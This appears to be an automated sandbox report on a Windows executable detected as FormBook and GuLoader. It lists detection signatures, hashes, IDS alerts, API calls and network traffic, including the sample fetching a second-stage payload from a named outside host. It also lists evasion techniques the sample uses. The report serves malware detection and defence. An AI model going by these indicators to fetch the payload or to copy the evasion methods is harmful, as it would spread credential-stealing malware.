Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0GuwV0t2UU.exe

Overview

General Information

Sample name:0GuwV0t2UU.exe
renamed because original name is a hash value
Original sample name:d29146778b6cd9ce8c5d12a8f3fc16a9d25bdc27d2588bb0e70d57728deb0fff.exe
Analysis ID:1549467
MD5:4ea3d3a468f53ca1b57d8c2db7eb3037
SHA1:cf31eb62d544ebef441f5d2cc2e219d65bd43ad6
SHA256:d29146778b6cd9ce8c5d12a8f3fc16a9d25bdc27d2588bb0e70d57728deb0fff
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook, GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 0GuwV0t2UU.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\0GuwV0t2UU.exe" MD5: 4EA3D3A468F53CA1B57D8C2DB7EB3037)
    • 0GuwV0t2UU.exe (PID: 7216 cmdline: "C:\Users\user\Desktop\0GuwV0t2UU.exe" MD5: 4EA3D3A468F53CA1B57D8C2DB7EB3037)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.3145283903.0000000037460000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2401247870.00000000049AA000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-05T17:08:55.499395+010020229301A Network Trojan was detected4.175.87.197443192.168.2.849706TCP
      2024-11-05T17:09:34.164818+010020229301A Network Trojan was detected4.175.87.197443192.168.2.849708TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 0GuwV0t2UU.exeAvira: detected
      Source: 0GuwV0t2UU.exeReversingLabs: Detection: 58%
      Source: Yara matchFile source: 00000007.00000002.3145283903.0000000037460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: 0GuwV0t2UU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.8:49709 version: TLS 1.2
      Source: 0GuwV0t2UU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: 0GuwV0t2UU.exe, 00000007.00000001.2399745830.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: 0GuwV0t2UU.exe, 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2779347987.000000003761C000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2777362328.0000000037463000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: 0GuwV0t2UU.exe, 0GuwV0t2UU.exe, 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2779347987.000000003761C000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2777362328.0000000037463000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: 0GuwV0t2UU.exe, 00000007.00000001.2399745830.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
      Source: Joe Sandbox ViewIP Address: 193.107.36.30 193.107.36.30
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49706
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49708
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /escDKcLKdKFF2.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: alfacen.comCache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: alfacen.com
      Source: 0GuwV0t2UU.exe, 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 0GuwV0t2UU.exe, 00000000.00000000.1398904537.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: 0GuwV0t2UU.exe, 00000007.00000001.2399745830.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: 0GuwV0t2UU.exe, 00000007.00000001.2399745830.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: 0GuwV0t2UU.exe, 00000007.00000001.2399745830.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: 0GuwV0t2UU.exe, 00000007.00000002.3115603087.0000000007523000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/
      Source: 0GuwV0t2UU.exe, 00000007.00000002.3115603087.0000000007523000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/8
      Source: 0GuwV0t2UU.exe, 00000007.00000002.3143905331.0000000036BE0000.00000004.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2777936328.0000000007534000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2777753505.0000000007534000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000002.3115865234.0000000007536000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000002.3115603087.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/escDKcLKdKFF2.bin
      Source: 0GuwV0t2UU.exe, 00000007.00000002.3115603087.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/escDKcLKdKFF2.bin$
      Source: 0GuwV0t2UU.exe, 00000007.00000002.3115603087.00000000074E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/escDKcLKdKFF2.bin.
      Source: 0GuwV0t2UU.exe, 00000007.00000003.2777936328.0000000007534000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2777753505.0000000007534000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000002.3115865234.0000000007536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/escDKcLKdKFF2.bin=
      Source: 0GuwV0t2UU.exe, 00000007.00000001.2399745830.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.8:49709 version: TLS 1.2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00405866 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405866

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000007.00000002.3145283903.0000000037460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378435C0 NtCreateMutant,LdrInitializeThunk,7_2_378435C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_37842DF0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37843090 NtSetValueKey,7_2_37843090
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37843010 NtOpenDirectoryObject,7_2_37843010
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37843D10 NtOpenProcessToken,7_2_37843D10
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37843D70 NtOpenThread,7_2_37843D70
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378439B0 NtGetContextThread,7_2_378439B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37844650 NtSuspendThread,7_2_37844650
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37844340 NtSetContextThread,7_2_37844340
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842F90 NtProtectVirtualMemory,7_2_37842F90
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842FA0 NtQuerySection,7_2_37842FA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842FB0 NtResumeThread,7_2_37842FB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842FE0 NtCreateFile,7_2_37842FE0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842F30 NtCreateSection,7_2_37842F30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842F60 NtCreateProcessEx,7_2_37842F60
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842E80 NtReadVirtualMemory,7_2_37842E80
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842EA0 NtAdjustPrivilegesToken,7_2_37842EA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842EE0 NtQueueApcThread,7_2_37842EE0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842E30 NtWriteVirtualMemory,7_2_37842E30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842DB0 NtEnumerateKey,7_2_37842DB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842DD0 NtDelayExecution,7_2_37842DD0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842D00 NtSetInformationFile,7_2_37842D00
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842D10 NtMapViewOfSection,7_2_37842D10
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842D30 NtUnmapViewOfSection,7_2_37842D30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842CA0 NtQueryInformationToken,7_2_37842CA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842CC0 NtQueryVirtualMemory,7_2_37842CC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842CF0 NtOpenProcess,7_2_37842CF0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842C00 NtQueryInformationProcess,7_2_37842C00
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842C60 NtCreateKey,7_2_37842C60
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842C70 NtFreeVirtualMemory,7_2_37842C70
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842B80 NtQueryInformationFile,7_2_37842B80
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842BA0 NtEnumerateValueKey,7_2_37842BA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842BE0 NtQueryValueKey,7_2_37842BE0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842BF0 NtAllocateVirtualMemory,7_2_37842BF0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842B60 NtClose,7_2_37842B60
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842AB0 NtWaitForSingleObject,7_2_37842AB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842AD0 NtReadFile,7_2_37842AD0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37842AF0 NtWriteFile,7_2_37842AF0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00406DC00_2_00406DC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_6E9F1BFF0_2_6E9F1BFF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CF7B07_2_378CF7B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C16CC7_2_378C16CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378556307_2_37855630
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AD5B07_2_378AD5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D95C37_2_378D95C3
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C75717_2_378C7571
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CF43F7_2_378CF43F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378014607_2_37801460
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3785739A7_2_3785739A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FD34C7_2_377FD34C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C132D7_2_378C132D
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378152A07_2_378152A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782B2C07_2_3782B2C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B12ED7_2_378B12ED
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF1727_2_377FF172
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781B1B07_2_3781B1B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378DB16B7_2_378DB16B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3784516C7_2_3784516C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378170C07_2_378170C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BF0CC7_2_378BF0CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C70E97_2_378C70E9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CF0E07_2_378CF0E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37811F927_2_37811F92
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CFFB17_2_378CFFB1
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CFF097_2_378CFF09
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377D3FD57_2_377D3FD5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377D3FD27_2_377D3FD2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37819EB07_2_37819EB0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782FDC07_2_3782FDC0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37813D407_2_37813D40
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C1D5A7_2_378C1D5A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C7D737_2_378C7D73
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CFCF27_2_378CFCF2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37889C327_2_37889C32
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782FB807_2_3782FB80
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37885BF07_2_37885BF0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3784DBF97_2_3784DBF9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CFB767_2_378CFB76
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37855AA07_2_37855AA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378ADAAC7_2_378ADAAC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B1AA37_2_378B1AA3
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BDAC67_2_378BDAC6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CFA497_2_378CFA49
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C7A467_2_378C7A46
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37883A6C7_2_37883A6C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A59107_2_378A5910
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378199507_2_37819950
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782B9507_2_3782B950
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378138E07_2_378138E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3787D8007_2_3787D800
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780C7C07_2_3780C7C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378347507_2_37834750
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378107707_2_37810770
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782C6E07_2_3782C6E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D05917_2_378D0591
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378105357_2_37810535
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BE4F67_2_378BE4F6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B44207_2_378B4420
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C24467_2_378C2446
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D03E67_2_378D03E6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781E3F07_2_3781E3F0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CA3527_2_378CA352
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378902C07_2_378902C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B02747_2_378B0274
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D01AA7_2_378D01AA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C41A27_2_378C41A2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C81CC7_2_378C81CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378001007_2_37800100
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378AA1187_2_378AA118
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378981587_2_37898158
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A20007_2_378A2000
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788EFA07_2_3788EFA0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37802FC87_2_37802FC8
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781CFE07_2_3781CFE0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37852F287_2_37852F28
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37830F307_2_37830F30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B2F307_2_378B2F30
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37884F407_2_37884F40
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37822E907_2_37822E90
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CCE937_2_378CCE93
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CEEDB7_2_378CEEDB
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CEE267_2_378CEE26
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37810E597_2_37810E59
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37828DBF7_2_37828DBF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780ADE07_2_3780ADE0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781AD007_2_3781AD00
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378ACD1F7_2_378ACD1F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378B0CB57_2_378B0CB5
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37800CF27_2_37800CF2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37810C007_2_37810C00
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C6BD77_2_378C6BD7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378CAB407_2_378CAB40
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780EA807_2_3780EA80
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378129A07_2_378129A0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378DA9A67_2_378DA9A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378269627_2_37826962
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783E8F07_2_3783E8F0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781A8407_2_3781A840
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378128407_2_37812840
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F68B87_2_377F68B8
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: String function: 377FB970 appears 280 times
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: String function: 37857E54 appears 111 times
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: String function: 3788F290 appears 103 times
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: String function: 37845130 appears 58 times
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: String function: 3787EA12 appears 82 times
      Source: 0GuwV0t2UU.exeStatic PE information: invalid certificate
      Source: 0GuwV0t2UU.exe, 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0GuwV0t2UU.exe
      Source: 0GuwV0t2UU.exe, 00000007.00000003.2777362328.0000000037586000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0GuwV0t2UU.exe
      Source: 0GuwV0t2UU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal84.troj.evad.winEXE@3/9@1/1
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00404B12 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404B12
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile created: C:\Users\user\fllesskabsejedeJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile created: C:\Users\user\AppData\Local\Temp\nsfC03D.tmpJump to behavior
      Source: 0GuwV0t2UU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile read: C:\Users\desktop.iniJump to behavior
